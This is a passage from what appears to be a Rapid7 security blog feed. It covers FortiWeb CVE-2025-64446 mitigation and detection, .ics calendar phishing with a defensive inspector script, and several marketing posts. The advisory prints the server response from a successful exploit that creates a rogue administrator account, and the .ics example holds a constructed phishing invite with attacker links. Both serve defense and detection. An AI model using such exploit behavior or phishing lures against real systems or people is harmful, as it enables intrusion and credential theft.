  • Versions 7.4.0 through 7.4.9 are vulnerable, 7.4.10 and above are fixed.
  • Versions 7.2.0 through 7.2.11 are vulnerable, 7.2.12 and above are fixed.
  • Versions 7.0.0 through 7.0.11 are vulnerable, 7.0.12 and above are fixed.
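The following is an added example, not Rapid7's or Fortinet's own tooling, that turns the affected and fixed versions listed above into an inventory triage check. It assumes a constructed inventory format of "hostname,version" records; the branch ranges are the ones the advisory lists, and the handling of 6.x follows Rapid7's note that unsupported 6.x builds are also vulnerable with no fix on that branch.

```python
"""Triage FortiWeb version strings against the CVE-2025-64446 advisory ranges.

Added example, not Rapid7's or Fortinet's own code. Branch ranges are taken
from the Fortinet advisory as quoted in the post; the 6.x handling follows
Rapid7's note that unsupported 6.x builds are vulnerable and have no fix.
"""
from typing import List, Optional, Tuple

# First fixed build per supported branch, per the advisory. Every build in a
# branch below its first fixed version is affected.
FIXED_VERSIONS = {
    (8, 0): (8, 0, 2),
    (7, 6): (7, 6, 5),
    (7, 4): (7, 4, 10),
    (7, 2): (7, 2, 12),
    (7, 0): (7, 0, 12),
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.patch', tolerating a leading 'v' and a build suffix."""
    core = text.strip().lstrip("vV").split(",")[0].split("-")[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognized FortiWeb version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def assess(text: str) -> Tuple[str, Optional[str]]:
    """Return (status, recommended_target).

    status is one of 'vulnerable', 'fixed', 'unsupported-vulnerable' or
    'unknown-branch'; recommended_target is the first fixed build on the
    same branch, or a pointer to a supported branch for 6.x.
    """
    version = parse_version(text)
    if version[0] < 7:
        # No fixed build exists on 6.x; the only remediation is a branch upgrade.
        return "unsupported-vulnerable", "upgrade to a supported fixed branch (e.g. 8.0.2 or later)"
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return "unknown-branch", None
    if version < fixed:
        return "vulnerable", ".".join(str(n) for n in fixed)
    return "fixed", None


def triage_inventory(records: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Assess each 'hostname,version' record (constructed inventory format)."""
    report = []
    for record in records:
        host, _, version = record.partition(",")
        status, target = assess(version)
        report.append((host.strip(), status, target))
    return report


if __name__ == "__main__":
    # Constructed sample inventory; hostnames and builds are illustrative only.
    sample = ["waf-01,8.0.1", "waf-02,8.0.2", "waf-03,7.4.9", "waf-04,6.3.1", "waf-05,7.6.5"]
    for host, status, target in triage_inventory(sample):
        print(f"{host}: {status}" + (f" -> {target}" if target else ""))
```

The check compares tuples rather than strings so that 7.4.9 sorts below 7.4.10; a plain string comparison would get that pair wrong. Anything on a branch the advisory does not list is reported as unknown rather than silently treated as fixed.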

In cases where immediate upgrades are not possible, the advisory states the following: “Disable HTTP or HTTPS for internet facing interfaces. Fortinet recommends taking this action until an upgrade can be performed. If the HTTP/HTTPS Management interface is internally accessible only as per best practice, the risk is significantly reduced.”

Rapid7 Labs has confirmed that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034. Customers using unsupported versions of FortiWeb should update to a supported version, as described above.

Exploitation behavior

When the public exploit is run against a FortiWeb device, the application responds differently on versions 8.0.1 and 8.0.2; both responses are included below.

Against version 8.0.1, the application returns the following response for a successful exploitation attempt, in which a new malicious local administrator account “hax0r” was created:

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2025 17:57:28 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1202

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "hax0r", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763056648, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }

However, against version 8.0.2, the application returns the following “403 Forbidden” response for an unsuccessful exploitation attempt:

HTTP/1.1 403 Forbidden
Date: Thu, 13 Nov 2025 17:28:42 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Content-Length: 199
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>

Rapid7 customers

Exposure Command, InsightVM and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess their exposure to both vulnerabilities described in this blog post as follows:

  • CVE-2025-64446: an unauthenticated vulnerability check is available in the November 14 content release. Please note that the “SAFE” check mode needs to be disabled while running scans to ensure the check for CVE-2025-64446 runs successfully.
  • CVE-2025-58034: an authenticated vulnerability check is available in the November 26 content release. There is no need to disable the “SAFE” check mode, since the CVE-2025-58034 check will run by default.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-64446, including a Sigma rule and IOCs of IP addresses attempting to exploit this vulnerability.

Updates

  • November 14, 2025: The blog post has been updated to reflect the newly published official advisory and CVE identifier, the availability of vulnerability checks and a Metasploit module for customer testing, the CISA KEV addition, and a published technical analysis.

  • November 17, 2025: The Rapid7 customers section has been updated to add Intelligence Hub coverage, and clarify that vulnerability checks were shipped on Nov 14, 2025.

  • November 19, 2025: The Overview section has been updated to reference the newly published vulnerability, CVE-2025-58034. The Rapid7 customers section has been updated to add expected coverage availability for CVE-2025-58034.

  • November 19, 2025: The Rapid7 customers section has been updated with CVE-2025-58034 coverage information for supported FortiWeb release branches.

  • December 1, 2025: The Mitigation guidance section has been updated with confirmation that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034.

Rapid7 Named a Leader in the 2025 Gartner Exposure Assessment Platform Magic Quadrant

13 November 2025 at 11:55

We’re proud to share that Rapid7 has been recognized as a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms (EAP). We believe this recognition underscores our commitment to redefining security operations by embedding continuous, business-aligned exposure management into the core of modern defense strategies.

Our approach: Exposure Command at the core

At the root of Rapid7’s leadership is Exposure Command, our unified exposure management solution, underpinned by complete attack surface visibility, threat-informed risk assessment and integrated automated remediation capabilities.

Key capabilities highlighted in the report include:

  • Unified visibility across environments: Broad attack surface visibility with native support across hybrid infrastructure including on-prem, cloud, containers, and IoT/OT, alongside extensive integrations with third-party security and ITOps tools.

  • Threat-validated prioritization: Prioritization enhanced with real-world exploit intelligence, plus continuous red teaming and ad-hoc penetration testing through comprehensive managed services.

  • Comprehensive, AI-driven remediation: Prebuilt workflows and playbooks, intelligent automation, and dynamic persona-centric reporting.

Why exposure assessment matters more than ever

The security landscape has fundamentally changed. Traditional vulnerability management, largely centered around point-in-time scans and CVSS scores, can no longer keep pace with the dynamic, hybrid environments that define today’s enterprise. Organizations face an ever-expanding attack surface across cloud, on-prem, SaaS, and OT environments while regulations continue to evolve.

This means the scope of IT and security leaders has expanded dramatically, from tech-centric systems management and patching to a core pillar of the business at large. As a result, exposure management is no longer about finding more; it’s about finding what matters and acting on it decisively. This aligns directly with Gartner’s CTEM model, which calls for a continuous, outcome-focused cycle of scoping, prioritization, validation, and mobilization.

Why CTEM + EAP are the future of risk reduction

CTEM isn’t just a buzzword and a new acronym; it’s the next evolution of proactive security, acknowledging a core truth: no organization can patch everything, nor should they try.

The goal is validated exposure reduction through five stages:

  1. Business-aligned scoping (e.g., revenue-generating services, critical data systems)

  2. Cross-domain discovery (cloud, identity, SaaS, on-prem, OT)

  3. Threat-informed prioritization with real-world intelligence

  4. Validation via attack-path modeling or adversary emulation (e.g., PTaaS, BAS, AEV)

  5. Mobilization through integrated, repeatable remediation workflows

Gartner suggests CTEM is a way to translate technical vulnerabilities into business-relevant risks and mobilize cross-functional teams in response. EAPs, which Gartner defines as platforms that continuously identify and prioritize exposures across all environments with business and threat context, provide the operational foundation for CTEM.

Figure: CTEM 5-step cycle

Rapid7’s EAP capabilities allow teams to operationalize CTEM by translating technical findings into business-relevant risk and enabling cross-functional response, bridging the gap between posture and business continuity.

Looking ahead

As exposure management evolves from a siloed security function to an operational imperative, Rapid7 will continue to lead with innovation, transparency, and a relentless focus on customer outcomes. We believe our position as a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms is not just a recognition of the work we’ve done but a signal to the market of what’s next. Click here to download the full Report.

Attackers accelerate, adapt, and automate: Rapid7’s Q3 2025 Threat Landscape Report

12 November 2025 at 08:55

The Q3 2025 Threat Landscape Report, authored by the Rapid7 Labs team, paints a clear picture of an environment where attackers are moving faster, working smarter, and using artificial intelligence to stay ahead of defenders. The findings reveal a threat landscape defined by speed, coordination, and innovation.

The quarter showed how quickly exploitation now follows disclosure: Rapid7 observed newly reported vulnerabilities weaponized within days, if not hours, leaving organizations little time to patch before attackers struck. Critical business platforms and third-party integrations were frequent targets, as adversaries sought direct paths to disruption. Ransomware remained the most visible threat, but the nature of these operations continued to evolve.

Groups such as Qilin, Akira, and INC Ransom drove much of the activity, while others went quiet, rebranded, or merged into larger collectives. The overall number of active groups increased compared to the previous quarter, signaling renewed energy across the ransomware economy. Business services, manufacturing, and healthcare organizations were the most affected, with the majority of incidents occurring in North America.

Many newer actors opted for stealth, limiting public exposure by leaking fewer victim details and opting for “information-lite” screenshots in an effort to thwart law enforcement. Some established groups built alliances and shared infrastructure to expand their reach, such as Qilin extending its influence through partnerships with DragonForce and LockBit. Meanwhile, SafePay gained ground by running a fully in-house, hands-on model, avoiding inter-party duelling and law enforcement. These trends show how ransomware has matured into a complex, service-based ecosystem.

Nation-state operations in Q3 favored persistence and stealth over disruption. Russian, Chinese, Iranian, and North Korean-linked groups maintained long-running campaigns. Many targeted identity systems, telecom networks, and supply chains. Rapid7’s telemetry showed these actors shrinking the window between disclosure and exploitation and relying on legitimate synchronization processes to remain hidden for months. The result: attacks that are harder to spot and even harder to contain.

Threat actors are fully operationalizing AI to enhance deception, automate intrusions, and evade detection. Generative tools now power realistic phishing, deepfake vishing, influence operations, and adaptive malware like LAMEHUG. The theoretical risk of AI has become an operational one. Defenders must now assume, rather than merely suppose, that attackers are using these tools and techniques against them.

This is but a taste of the valuable threat information the report has to offer. In addition to deeper dives on the subjects above, the threat report includes analysis of some of the most common compromise vectors, new vulnerabilities and existing ones still favored by attackers, and, of course, our recommendations to safeguard against compromises across your entire attack surface. 

Want to learn more? Click here to download the report.

Protecting What Powers Business: Rapid7 and Microsoft Partner to Simplify Security

10 November 2025 at 09:00

Across industries, Microsoft is everywhere. It powers productivity, collaboration, and security through Defender, Sentinel, Entra, and the broader Microsoft ecosystem that underpins how modern organizations operate.

As organizations deepen their Microsoft investments, there’s an even greater opportunity to strengthen and simplify threat detection and response. Microsoft delivers powerful visibility and security insights across user identities, endpoints, and cloud workloads, but security teams often need help bringing those capabilities together with the rest of their environment to ensure that data, detections, and decisions that drive their threat detection and response program align seamlessly. 

That’s where Rapid7 comes in.

A shared vision for simplified, unified security

We’re excited to announce the launch of an expanded partnership between Rapid7 and Microsoft, focused on helping organizations fully realize the potential of their Microsoft security investments. Together, we’re building a unified approach to threat detection and response that combines Microsoft’s ecosystem and scale with Rapid7’s AI-native security operations platform and decades of SOC expertise.

Our shared goal: help customers protect their businesses with clarity, speed, and confidence.

For many organizations, Microsoft is the backbone of their IT and security programs. But it’s only one part of a larger, interconnected environment. Security leaders need a way to bring Microsoft Defender, Sentinel, and Entra data into context with the rest of their infrastructure, cloud, and SaaS investments. Rapid7 helps make that possible by connecting Microsoft’s advanced telemetry and analytics with broader visibility and context into all security data, automation, and 24/7 expert-led managed operations.

We’ve long incorporated deep Microsoft visibility across the Command Platform, integrating with tools across different use cases, such as attack surface management, exposure management, cloud security, and application security. This foundation already allows us to correlate insights across on-premises and cloud environments, including Active Directory, Azure, and Microsoft 365 – providing outcomes across endpoints, workloads, and applications. These capabilities unify context from more than a dozen different Microsoft and Azure tools, giving customers a complete picture of risk across their environment. 

This partnership combines Microsoft Defender’s signal depth with Rapid7’s threat intelligence, automation, and human-led operations to deliver complete visibility and coordinated response across your environment – from Microsoft to everything it touches.

This means:

  • Unified security operations managed for you: Rapid7 delivers 24x7 monitoring, investigation, and response across Microsoft and non-Microsoft environments, combining Defender insights with our own detection and response workflows to act quickly on what matters most.

  • Faster, smarter response: AI-driven correlation and human-led expertise reduce alert noise and accelerate containment when threats arise.

  • Simplified, predictable operations: Our managed detection and response (MDR) service removes ingestion complexity so you can focus on security outcomes.

  • Transparency and trust: Built in through seamless integration with the Microsoft consoles security teams already use.

A foundation for what’s next

Over the coming months, we'll introduce new capabilities that make it easier for customers to operationalize Microsoft security within the Rapid7 ecosystem, including unified MDR coverage across the Defender products that protect the key vectors of endpoint, identity, cloud, and email.

These enhancements will enable organizations to not only respond to Microsoft-based threats faster but also proactively reduce risk across their entire environment through unified detection, investigation, and response.

We’re excited for this next step in advancing our MDR services to meet Microsoft customers where they are and maximize their investments with comprehensive visibility, faster response, and measurable security outcomes.

We’ll be releasing more information soon. In the meantime, learn more about Rapid7’s leading MDR service here.

When Your Calendar Becomes the Compromise

6 November 2025 at 13:42

A new meeting on your calendar or a new attack vector?

It starts innocently enough. A new meeting appears in your Google calendar and the subject seems ordinary, perhaps even urgent: “Security Update Briefing,” “Your Account Verification Meeting,” or “Important Notice Regarding Benefits.” You assume you missed this invitation in your overloaded email inbox, and click “Yes” to accept.

Unfortunately, calendar invites have become an overlooked delivery mechanism for social engineering and phishing campaigns. Attackers are increasingly abusing the .ics file format, a universally trusted, text-based standard, to embed malicious links, redirect victims to fake meeting pages, or seed events directly into users’ calendars without interaction.

Because calendar files often bypass traditional email and attachment defenses, they offer a low-friction attack path into corporate environments. 

Defenders should treat .ics files as active content, tighten client defaults, and raise awareness that even legitimate-looking calendar invites can carry hidden risk.

The underestimated threat of .ics files

The iCalendar (.ics) format is one of those technologies we all rely on without thinking. It’s text-based, universally supported, and designed for interoperability between Outlook, Google Calendar, Apple, and countless other clients.

Each invite contains a structured list of fields like SUMMARY, LOCATION, DESCRIPTION, and ATTACH. Within these, attackers have found an opportunity: they can embed URLs, malicious redirects, or even base64-encoded content. The result is a file that appears completely legitimate to a calendar client, yet quietly delivers the attacker’s message, link, or payload.

Because calendar files are plain text, they easily slip through traditional security controls. Most email gateways and endpoint filters don’t treat .ics files with the same scrutiny as executables or macros. And since users expect to receive meeting invites, often from outside their organization, it’s an ideal format for social engineering.

How threat actors abuse the invite

Over the past year, researchers have observed a rise in campaigns abusing calendar invites to phish credentials, deliver malware, or trick users into joining fake meetings. These attacks often look mundane but rely on subtle manipulation:

  • The lure: A professional-looking meeting name and sender, sometimes spoofed from a legitimate organization.

  • The link: A URL hidden in the DESCRIPTION or LOCATION field, often pointing to a fake login page or document-sharing site.

  • The timing: Invites scheduled within minutes, creating urgency (“Your access expires in 15 minutes — join now”).

  • The automation: Calendar clients that automatically add external invites, ensuring the trap appears directly in the user’s daily schedule.

Figure: Example of where some of the malicious components would reside in the .ics file

It’s clever, low-effort social engineering leveraging trust in a system built for collaboration.

The “invisible click” problem

The real danger of malicious calendar invites isn’t just the link inside, it’s the automatic delivery mechanism. In certain configurations, Outlook and Google Calendar will automatically process .ics attachments and create tentative events, even if the user never opens or even receives the email. That means the malicious link is now part of the user’s trusted interface with their calendar.

This bypasses the usual cognitive warning signs. The email might look suspicious, but the event reminder popping up later? That feels like part of your day. It’s phishing that moves in quietly and waits.

Why traditional defenses miss it

Security tooling has historically focused on attachments that execute code or scripts. By contrast, .ics files are plain text and standards-based, so they don’t inherently appear dangerous. Many detection engines ignore or minimally parse them.

Attackers exploit that gap. They rely on the fact that few organizations monitor for BEGIN:VCALENDAR content or inspect calendar metadata for embedded URLs. Once delivered, the file can bypass filters, land in the user’s calendar, and lead to a high-confidence click.

What defenders can do now

Defending against calendar-based attacks begins with recognizing that these are not edge cases anymore. They’re a natural evolution of phishing, where user convenience becomes the delivery mechanism.

Here are a few pragmatic steps every organization should consider:

  1. Treat .ics files like active content. Configure email filters and attachment scanners to inspect calendar files for URLs, base64-encoded data, or ATTACH fields.

  2. Review calendar client defaults. Disable automatic addition of external events when possible, or flag external organizers with clear warnings.

  3. Sanitize incoming invites. Content disarm and reconstruction (CDR) tools can strip out or neutralize dangerous links embedded in calendar fields.

  4. Raise awareness among users. Train employees to verify unexpected invites — especially those urging immediate action or containing meeting links they didn’t anticipate. Employees can also follow the helpful advice in this Google Support article.

  5. Use strong identity protection. Multi-factor authentication and conditional access policies mitigate the impact if a phishing link successfully steals credentials.

These steps don’t eliminate the threat, but they significantly increase friction for attackers and their malware.
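The fields named earlier (SUMMARY, LOCATION, DESCRIPTION, ATTACH) and step 1 above both come down to the same thing: parse the invite as content and look at what it carries. The following is an added example, not Rapid7's code or any vendor's gateway filter, of a static .ics inspector of the kind a mail filter hook might run. It unfolds RFC 5545 continuation lines (so a URL split across lines is reassembled), strips property parameters, undoes iCalendar text escaping, then reports embedded links in the link-bearing fields, inline base64 ATTACH data, and organizers outside an assumed list of internal domains. The sample invite, the `example.com` internal domain and the `attacker.invalid` hostnames are all constructed for the example.

```python
"""Static inspection of .ics invites, as an email gateway hook might do.

Added example, not Rapid7's own code. The field list follows the fields the
post names (DESCRIPTION, LOCATION, ATTACH) plus URL and X-ALT-DESC; the
internal-domain list and the sample invite below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Properties in which a link or payload can be hidden from a casual viewer.
LINK_FIELDS = {"DESCRIPTION", "LOCATION", "URL", "ATTACH", "X-ALT-DESC", "COMMENT"}


@dataclass
class Finding:
    severity: str  # "warn" or "high"
    field: str
    detail: str


def unfold(raw: str) -> List[str]:
    """Undo RFC 5545 line folding: a line starting with space or tab continues the previous one."""
    lines: List[str] = []
    for line in raw.replace("\r\n", "\n").split("\n"):
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += line[1:]
        elif line:
            lines.append(line)
    return lines


def parse_property(line: str) -> Tuple[str, Dict[str, str], str]:
    """Split 'NAME;PARAM=VAL;...:value' into (name, params, value)."""
    in_quotes = False
    for i, ch in enumerate(line):  # first ':' outside a quoted parameter ends the header
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            head, value = line[:i], line[i + 1:]
            break
    else:
        return line.upper(), {}, ""
    name, *params = head.split(";")
    pdict = {}
    for p in params:
        k, _, v = p.partition("=")
        pdict[k.upper()] = v.strip('"')
    return name.upper(), pdict, value


def unescape_text(value: str) -> str:
    """Undo iCalendar TEXT escaping so a URL broken by '\\n' or '\\,' is recovered."""
    return (value.replace("\\n", "\n").replace("\\N", "\n")
                 .replace("\\,", ",").replace("\\;", ";").replace("\\\\", "\\"))


def inspect_ics(raw: str, internal_domains=("example.com",)) -> List[Finding]:
    """Return findings for external organizers, inline base64 attachments and embedded links."""
    findings: List[Finding] = []
    for line in unfold(raw):
        name, params, value = parse_property(line)
        if name == "ORGANIZER":
            addr = value.lower()
            addr = addr[len("mailto:"):] if addr.startswith("mailto:") else addr
            if addr.rsplit("@", 1)[-1] not in internal_domains:
                findings.append(Finding("warn", name, f"external organizer {addr}"))
        if name == "ATTACH" and params.get("ENCODING", "").upper() == "BASE64":
            findings.append(Finding("high", name,
                                    f"inline base64 attachment, FMTTYPE={params.get('FMTTYPE', '?')}"))
        if name in LINK_FIELDS:
            for url in URL_RE.findall(unescape_text(value)):
                findings.append(Finding("warn", name, f"embedded link {url}"))
    return findings


# Constructed sample invite mirroring the lure described in the post.
SAMPLE_INVITE = "\r\n".join([
    "BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//constructed sample//EN", "METHOD:REQUEST",
    "BEGIN:VEVENT",
    "UID:constructed-0001@invalid",
    "DTSTART:20251106T134200Z",
    "ORGANIZER;CN=IT Helpdesk:mailto:helpdesk@attacker.invalid",
    "SUMMARY:Security Update Briefing",
    "LOCATION:https://login.attacker.invalid/verify",
    "DESCRIPTION:Your access expires in 15 minutes.\\nJoin now: https://meet.att",
    " acker.invalid/join?id=42",
    "ATTACH;FMTTYPE=application/pdf;ENCODING=BASE64;VALUE=BINARY:JVBERi0xLjQK",
    "END:VEVENT", "END:VCALENDAR",
])

if __name__ == "__main__":
    for f in inspect_ics(SAMPLE_INVITE):
        print(f"[{f.severity}] {f.field}: {f.detail}")
```

Two details matter for a filter like this: unfolding must happen before any pattern matching, because a link split across a continuation line will otherwise never match, and parameters such as ENCODING=BASE64 have to be read separately from the value, since the value itself looks like harmless text.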

A quiet evolution in social engineering campaigns

Malicious calendar invites represent a subtle yet telling shift in attacker behavior: blending into legitimate business processes rather than breaking them. In the same way that invoice-themed phishing emails once exploited trust in accounting workflows, .ics abuse leverages the quiet reliability of collaboration tools.

As organizations continue to integrate calendars with chat, cloud storage, and video platforms, the attack surface will only expand. Links inside invites will lead to files in shared drives, authentication requests, and embedded meeting credentials. These are all opportunities for exploitation.

Rethinking trust in everyday workflows

Defenders often focus on the extraordinary like zero days, ransomware binaries, and new exploits. Yet the most effective attacks remain the simplest: exploiting human trust in ordinary digital habits. A calendar invite feels harmless and that’s exactly why it works.

The next time an unexpected meeting appears in your calendar, it might be more than just a double-booking. It could be a reminder that security isn’t only about blocking malware, but about questioning what we assume to be safe.

MDR ROI, Proven Outcomes, and What Security Leaders Need to Ask For

6 November 2025 at 08:55

Cybersecurity ROI is notoriously difficult to define, but not impossible.

In this Experts on Experts: Commanding Perspectives episode, Craig Adams chats with Steve Edwards, Director of Threat Intelligence & Detection Engineering, about what customers really get from Rapid7 MDR and how to think more clearly about value.

They cut through buzzwords and talk real-world outcomes: visibility, consolidation, faster response, and trust.

What ROI really looks like

As Steve explains, the ROI conversation starts with confidence. Once customers know they can trust the MDR team to cut through noise and take action, the benefits snowball from reduced false positives, to better visibility and smarter spend.

The IDC study highlighted a 422% ROI over three years. But the real signal is what teams can do with the time and clarity they gain.

To bring these numbers into your own context, you can use the Rapid7 MDR ROI Calculator - simply plug in your own parameters and apply IDC’s methodology to estimate your unique return. Try the ROI Calculator!

Telemetry without tradeoffs

Craig and Steve also dig into one of the biggest detection challenges today: partial visibility. Many orgs still pay by the log, creating disincentives for full data ingestion. MDR’s all-in access model helps customers detect threats earlier and act faster, without needing to triage upstream data decisions.

MITRE mapping makes it click

One of the most actionable insights? MITRE mapping. Steve talks about how customers are using visual coverage data to pinpoint gaps and prioritize onboarding new tech, or building compensating controls.

No-cap incident response

They also walk through what happens during the first 24-48 hours of an incident, and why having no cap on IR hours means Rapid7 can stay involved from containment to eradication.

Ready to dive in?

Watch the full episode here
Explore Rapid7's full ROI analysis

Missed our earlier episodes?
Catch up on Episode 1 with Laura Ellis on agentic AI and system governance [here], Episode 2 with Jon Hencinski on MDR strategy and SOC readiness [here] and Episode 3 with Raj Samani on cybercrime-as-a-service [here]

2025 Cybersecurity Predictions: How did we do?

5 November 2025 at 09:00

Every industry has their it’s-that-time-of-year-again rituals, and the cybersecurity industry is no different. The spring ushers in RSA, August is Hacker Summer Camp, October brings with it Cybersecurity Awareness Month — and, before we know it, it’s the end of the year and we’re once again making our “predictions” of what lies ahead. 

A wise young man once said, “Life moves pretty fast. If you don’t stop and look around once in a while, you could miss it.” In our space, a whole lot is moving fast. To see clearly, it's certainly important to take a moment to step away from the noise and look outward.

Many experts offer their predictions for the coming year, but how many stop to look back at how their vision for the current year fared? With that in mind, let’s take a look at the predictions Rapid7 experts made for 2025. 

A look back

Prediction: "Greater visibility will act as a life preserver for security teams treading water across an increasingly complex attack surface."

The importance of unified visibility, attack surface management, and exposure insight has become a leading theme in industry trends reports in 2025. The exposure management market is growing strongly, projected to hit ~$10.9 billion by 2030, which is up from ~$3.3 billion in 2024. Managed Detection and Response (MDR) adoption is also surging; the MDR market reached USD 4.19 billion in 2025 and is forecasted to keep growing fast. 

Rapid7 customer New Zealand Automobile Association (NZAA) offers a real-world example of this trend. Before working with Rapid7, NZAA’s cybersecurity tools were fragmented and disjointed. This lack of a unified approach reduced visibility and slowed down threat responses. Now, with Rapid7’s MDR service, NZAA has a partner that can provide 24/7 support, centralized visibility, and predictable data usage — all with transparency and scalability.

This is just one example of the evidence we’ve seen that security teams are acting to consolidate disparate tooling and connect proactive exposure risk management with reactive detection and response capabilities. As a result, these teams and their organizations are shifting holistically into a confident, resilient security posture.

Prediction: "To thrive in a world where regulatory change is an ongoing concern, SecOps should prepare for both the predictable and the unpredictable."

Regulatory change is indeed accelerating. For example, the EU's Cyber Resilience Act was passed in 2024, with application phases extending toward 2027.

The UK announced the Cyber Security and Resilience Bill in 2024 to extend cyber obligations on organizations. Security operations teams have had to deal with both "expected" regulatory shifts (like NIS2, SEC rules) and unexpected mandates or cross-jurisdictional tensions.

Many organizations are now incorporating compliance readiness, threat modelling for future rules, and flexible architectures. Moving forward, SecOps should expect even more scrutiny over how operations are designed and architected, as well as how insights are shared and with whom.

Prediction: "Cybercriminals will increasingly exploit zero-day vulnerabilities, expanding potential entry points and bypassing traditional security measures to deliver more ransomware attacks."

Zero days have continued to rise in prominence. Since 2023, Rapid7 has observed many notable zero-day-enabled ransomware and supply-chain attacks, including the mass exploitation of managed file transfer products such as MOVEit Transfer, Cleo's file transfer software, and GoAnywhere MFT, alongside campaigns by groups such as Scattered Spider.

Attackers are investing in zero-day toolchains, and zero-day brokers are emerging in underground markets (the "exploit-as-a-service" trend). See our Initial Access Brokers Report for more detail.

Rapid7's Q2 2025 Ransomware Trends Analysis research highlights that threat actors are using zero days more often, especially in critical or targeted operations within sectors such as services (21.2%), manufacturing (16.8%), retail (14.1%), healthcare (10.3%), and communications and media (10%).

In Q3 there were several instances of cybercriminals continuing to use zero-day exploits as initial access vectors in their ransomware campaigns. For example, CVE-2025-61882, affecting Oracle E-Business Suite, was exploited in the wild by Cl0p. The trend of cybercriminals exploiting zero-day vulnerabilities continues, as does the recurrence of not only the same cybercriminal groups but also the same products being targeted over time (e.g., the file transfer product GoAnywhere MFT).

A look ahead

2025 has certainly pushed security teams to their limits with an increasingly complex attack surface, accelerating regulatory changes, and a persistent rise in zero-day exploits and ransomware attacks. The ongoing talent gap and the struggle to bridge the divide between technical and business leadership have further compounded these challenges, making it crucial for organizations to prioritize visibility, proactive exposure management, and actionable threat intelligence.

What will 2026 bring? Take a look ahead with our experts: Register now for Rapid7’s Top Cybersecurity Predictions webinar.

The End Of Legacy SIEM: Why It’s Time To Take Command

4 November 2025 at 09:14

Security teams have long depended on SIEM tools as the backbone of threat detection and response. But the threat landscape, and the technology required to defend against it, has changed dramatically.

Rapid7’s new whitepaper, The End of Legacy SIEM and the Rise of Incident Command, examines why legacy SIEM models can no longer keep up with the scale and complexity of modern attacks, and why a next-generation SIEM (such as Rapid7's) combined with exposure management capabilities is the better choice for combating modern adversaries.

A turning point for the SOC

When SIEM first emerged, it was a breakthrough. For the first time, organizations could centralize log data, generate compliance reports, and detect threats from a single pane of glass. But two decades later, that approach is showing its age.

Today, data is distributed across cloud, on-prem, and hybrid environments. Adversaries are using artificial intelligence to automate and accelerate increasingly complex attacks that are escaping detection. Analysts are overwhelmed by alert fatigue and unpredictable costs that hamper visibility.

Legacy SIEM tools were built to collect data. They rely on rigid pricing models, static correlation rules, and constant manual upkeep. These systems slow down investigations and prevent analysts from focusing on the alerts that truly matter. Modern attackers exploit exposures faster than human teams can respond. Without automation, context, and clear prioritization, organizations remain in a reactive state. 

What comes after SIEM?

The whitepaper outlines how the security industry is shifting toward a unified approach that combines SIEM, Security Orchestration, Automation, and Response (SOAR), Attack Surface Management (ASM), and threat intelligence in one platform, augmented by artificial intelligence.

This new model emphasizes automation, machine learning, and contextual awareness while collecting data from a wider variety of sources than SIEMs were originally designed for. It gives security teams the ability to identify and act on high-impact threats quickly. It also changes how organizations think about risk, focusing less on collecting alerts and more on understanding exposure across assets, identities, and vulnerabilities.

Introducing Rapid7 Incident Command

